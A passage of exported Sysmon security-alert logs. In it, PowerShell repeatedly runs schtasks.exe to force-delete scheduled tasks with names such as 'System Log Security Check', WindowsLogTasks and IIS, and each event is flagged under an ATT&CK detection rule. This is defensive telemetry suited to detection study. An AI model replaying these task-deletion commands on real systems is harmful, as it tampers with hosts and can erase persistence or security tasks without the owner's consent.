Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.739",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.787 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001055bd2100} +ProcessId: 6148 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.791110900Z"",""eventRecordID"":""2813"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.787\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001055bd2100}\r\nProcessId: 6148\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 
/F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.787"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001055bd2100}"",""processId"":""6148"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:19:01.698",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.754 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001029bb2100} +ProcessId: 4228 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.757505800Z"",""eventRecordID"":""2812"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.754\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001029bb2100}\r\nProcessId: 4228\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.754"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001029bb2100}"",""processId"":""4228"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.681",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.719 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001080b82100} +ProcessId: 2596 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.722404000Z"",""eventRecordID"":""2811"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.719\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001080b82100}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.719"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001080b82100}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.634",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.686 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001022b62100} +ProcessId: 6308 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} 
+ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.689325800Z"",""eventRecordID"":""2810"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.686\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001022b62100}\r\nProcessId: 6308\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.686"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001022b62100}"",""processId"":""6308"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.605",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.651 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010cdb32100} +ProcessId: 7788 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.655637300Z"",""eventRecordID"":""2809"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.651\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010cdb32100}\r\nProcessId: 7788\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.651"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010cdb32100}"",""processId"":""7788"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.587",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.620 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00104db12100} +ProcessId: 7272 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.623716200Z"",""eventRecordID"":""2808"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.620\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00104db12100}\r\nProcessId: 7272\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete 
/TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.620"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00104db12100}"",""processId"":""7272"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 